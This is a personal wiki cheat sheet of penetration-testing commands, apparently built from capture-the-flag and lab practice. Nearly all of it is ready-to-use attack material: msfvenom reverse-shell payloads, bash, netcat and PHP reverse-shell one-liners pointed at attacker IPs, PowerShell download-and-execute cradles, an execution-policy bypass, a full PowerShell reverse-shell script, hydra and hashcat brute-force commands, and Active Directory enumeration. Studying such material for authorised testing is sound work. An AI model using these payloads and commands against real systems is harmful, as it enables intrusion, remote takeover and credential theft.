OLD CheatSheet: Difference between revisions
From Wiki Aghanim
Jump to navigationJump to search
imported>Aghanim No edit summary |
imported>Aghanim No edit summary |
||
(No difference)
| |||
Latest revision as of 10:31, 20 January 2022
Fix STTY in reverse shell
# In our shell. Remember the rows anc cols
stty -a
# On victim shell
stty rows cols
Python
PDB (Python Debugger)
https://docs.python.org/3/library/pdb.html
# Add import pdb
import pdb
# In script, before an error message, add
pdb.set_trace()
# Example
-> url = url.group(1)
(Pdb) print url.group(1)
http://swagshop.htb/index.php/admin/das[...]
(Pdb) continue
NMAP
Fast scan to list open ports
nmap -p- --min-rate 10000
Scan using default scripts and list version, output to nmap.result
nmap -sC -sV -oN nmap.result
Default nmap command to run against target
nmap -sC -sV -sU -p- --min-rate 10000 -oN outfile
Enumerate LDAP
nmap -n -sV --script "ldap* and not brute" -p 389 dc-ip
Stabilize shell with python
python -c 'import pty;pty.spawn(“/bin/bash”)'
export TERM=xterm
Background the shell using Ctrl + Z. In our terminal we use stty raw -echo; fg.
https://blog.aghanim.net/?p=1043
Python
Simple HTTP server
$python -m SimpleHTTPServer
SUID
Find SUID bit file
find / -perm -u=s -type f 2>/dev/null
SSH Port Forward
# Synopsis
ssh -i id_rsa -L [bind_address]port:host:hostport] username@host
# Example
ssh -i id_rsa -L 8000:127.0.0.1:8000 donkeykong@10.10.10.100
Chisel
Example: forward port 8888 to attacker using chisel
# Attacker machine
chisel server -p 8000 --reverse
# Target
chisel.exe client 10.10.14.20:8000 R:8888:localhost:8888
# Connection received on attacker machine
server: proxy#1:R:0.0.0.0:8888=>localhost:8888: Listening
Hashcat
Example commands
| Attack-mode | Hash-type | Example command |
|---|---|---|
| Wordlist | $P$ | hashcat -a 0 -m 400 example400.hash example.dict |
| Wordlist + Rules | MD5 | hashcat -a 0 -m 0 example0.hash example.dict -r rules/best64.rule |
| Brute-Force | MD5 | hashcat -a 3 -m 0 example0.hash ?a?a?a?a?a?a |
| Combinator | MD5 | hashcat -a 1 -m 0 example0.hash example.dict example.dict |
| Association | $1$ | hashcat -a 9 -m 500 example500.hash 1word.dict -r rules/best64.rule |
https://hashcat.net/wiki/doku.php?id=hashcat
Hydra
| Command | Description |
| hydra -P <wordlist> -v <ip> <protocol> | Brute force against a protocol of your choice |
| hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol> | You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts) |
| hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip> | Attack a Windows Remote Desktop with a password list. |
| hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' | Craft a more specific request for Hydra to brute force. |
https://www.tryhackme.com/room/hackpark
Msfvenom
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe
Windows x64
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > rev_x64_shell.exe
Stageless
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > rev_shell.exe
Staged
msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > rev_shell.exe
Linux x64
msfvenom -p linux/x64/shell/reverse_tcp LHOST= LPORT= -f elf > shell-x64.elf
Linux x86
msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT= -f elf > shell-x86.elf
PHPmsfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
ASP or ASPX
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp or aspx > rev_shell.asp or aspx
Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py
# Other platforms
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f elf > shell.elf
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f exe > shell.exe
$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f macho > shell.macho
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f asp > shell.asp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f raw > shell.jsp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f war > shell.war
$ msfvenom -p cmd/unix/reverse_python LHOST="10.0.0.1" LPORT=4242 -f raw > shell.py
$ msfvenom -p cmd/unix/reverse_bash LHOST="10.0.0.1" LPORT=4242 -f raw > shell.sh
$ msfvenom -p cmd/unix/reverse_perl LHOST="10.0.0.1" LPORT=4242 -f raw > shell.pl
$ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f raw > shell.php; cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php
Transfer files to and from target machine
https://ironhackers.es/en/cheatsheet/transferir-archivos-post-explotacion-cheatsheet/
imackets smbserver
Create a smbserver with share name "share", and location of folder to share
smbserver.py share /home/aghanim/Desktop/
## If target only supports smbserver2
smbserver.py share . -smb2support
## On target CMD
\\smbserver-ip\share\$FILE_NAME
## Copy file to target
copy \\smbserver-ip\share\$FILE_NAME .
## Copy file from target to attacker
copy FileToDownload \\smbserver-ip\share\FileToDownload
Netcat
Must have nc.exe binary on the target machine.
# Attacking machine command
nc -lvnp 4444 > FiletoDownload
## Victim machine command
nc.exe 10.10.10.100 4444 -w 3 < Filetodownload
Certutil
Easiest way to transfer to Windows
certutil -urlcache -split -f "http://ip-addr:port/file" [output-file]
Powershell
Must use single quote for URL. Worsk for Windows 7 & 2008 and above.
powershell -c (New-Object Net.WebClient).DownloadFile('http://ip-addr:port/file', 'output-file')
Compile .C to .exe
## Create 32-bit Windows executable with:
i686-w64-mingw32-gcc -o main32.exe main.c
## Create 64-bit Windows executable with:
x86_64-w64-mingw32-gcc -o main64.exe main.c
Pivoting technique
sshuttle
# Synopsis
sshuttle [options] -r [username@]sshserver[:port]
# Example
sshuttle -r linux-admin@10.200.122.33 10.200.122.0/24
Active Directory/Windows
Enumeration CMD
https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters#domain-info
Must have valid credentials on target.
echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller
net groups /domain #List of domain groups
net group "domain computers" /domain #List of PCs connected to the domain
net view /domain #Lis of PCs of the domain
nltest /dclist: #List domain controllers
net group "Domain Controllers" /domain #List PC accounts of domains controllers
net group "Domain Admins" /domain #List users with domain admin privileges
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the grup "Domain Admins" is included here)
net user /domain #List all users of the domain
net user /domain #Get information about that user
net accounts /domain #Password and lockout policy
nltest /domain_trust #Mapping of the trust relationships.
Curated list of commands
psexec - Login to windows machine to get a shell
python3 psexec.py test.local/john:password123@10.10.10.1
Powershell
Fix VHDX to Hyper-V import error - outputs error "Make sure the file is uncompressed and sparse"
fsutil sparse setflag "C:\FilePath\FileName.iso" 0
Running powershell x64, and running (IEX) the downloaded ps1 file.
c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.17:9000/mini-reverse.ps1')
Running Powershell on target with ExectionPolicy to bypass
powershell.exe -nop -exec bypass
Running PowerUp.ps1 on target machine
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.17:9000/PowerUp.ps1');Invoke-AllChecks"
Downloading SharpHound.exe on target machine
(new-object System.Net.WebClient).DownloadFile('http://10.10.14.17:9000/SharpHound.exe', 'C:\Users\[...]\Desktop\SharpHound.exe')
# Execute SharpHound
./SharpHound.exe
Running PowerView.ps1 on target machine
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.45:5555/PowerView.ps1')
Running Nishangs Invoke-PowershellTCP
powershell -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.18:9000/shell.ps1')")
Use invoke webrequest and download script. With -UseBasicParsing. -UseBasicParsing - Indicates that the cmdlet uses the response object for HTML content without Document Object Model (DOM) parsing. This parameter is required when Internet Explorer is not installed on the computers, such as on a Server Core installation of a Windows Server operating system.
iex (iwr '10.10.14.9:9000/ipw.ps1') -UseBasicParsing
Download a file and save it to location.
powershell Invoke-WebRequest -outfile c:\windows\system32\spool\drivers\color\nc.exe -uri http://10.10.14.24/nc64.exe
Mini-reverseshell.ps1
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;
$res = ""
while($stream.DataAvailable -or $read -eq $null) {
$read = $stream.Read($buffer, 0, 1024)
}
$out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
if(!$out.equals("exit")){
$args = "";
if($out.IndexOf(' ') -gt -1){
$args = $out.substring($out.IndexOf(' ')+1);
$out = $out.substring(0,$out.IndexOf(' '));
if($args.split(' ').length -gt 1){
$pinfo = New-Object System.Diagnostics.ProcessStartInfo
$pinfo.FileName = "cmd.exe"
$pinfo.RedirectStandardError = $true
$pinfo.RedirectStandardOutput = $true
$pinfo.UseShellExecute = $false
$pinfo.Arguments = "/c $out $args"
$p = New-Object System.Diagnostics.Process
$p.StartInfo = $pinfo
$p.Start() | Out-Null
$p.WaitForExit()
$stdout = $p.StandardOutput.ReadToEnd()
$stderr = $p.StandardError.ReadToEnd()
if ($p.ExitCode -ne 0) {
$res = $stderr
} else {
$res = $stdout
}
}
else{
$res = (&"$out" "$args") | out-string;
}
}
else{
$res = (&"$out") | out-string;
}
if($res -ne $null){
$writer.WriteLine($res)
}
}
}While (!$out.equals("exit"))
$writer.close();
$socket.close();
$stream.Dispose()
Find .NET Version using regkey
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
Potatos
https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html
Executing MSI on Windows
msiexec /quiet /i cmd.msi
Windows Exploit Suggester
python2 windows-exploit-suggester.py --systeminfo sys.txt -d 2022-01-14-mssb.xls
WebDav - Davtest
Scan the give WebDAV server
davtest -url http://10.10.10.15
Payloads & shells - Commands
BASH TCP
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
0/dev/tcp/10.0.0.1/4242; sh &196 2>&196
/bin/bash -l > /dev/tcp/10.0.0.1/4242 0&1
## Don't forget to check with others shell : sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash
BASH UDP
Victim:
sh -i >& /dev/udp/10.0.0.1/4242 0>&1
Listener:
nc -u -lvp 4242
Netcat Traditional
nc -e /bin/sh 10.0.0.1 4242
nc -e /bin/bash 10.0.0.1 4242
nc -c bash 10.0.0.1 4242
Netcat BusyBox
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
nc.exe
nc.exe -e cmd.exe attacker_ip attacker_port
PHP
php -r '$sock=fsockopen("10.10.14.17",4444);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
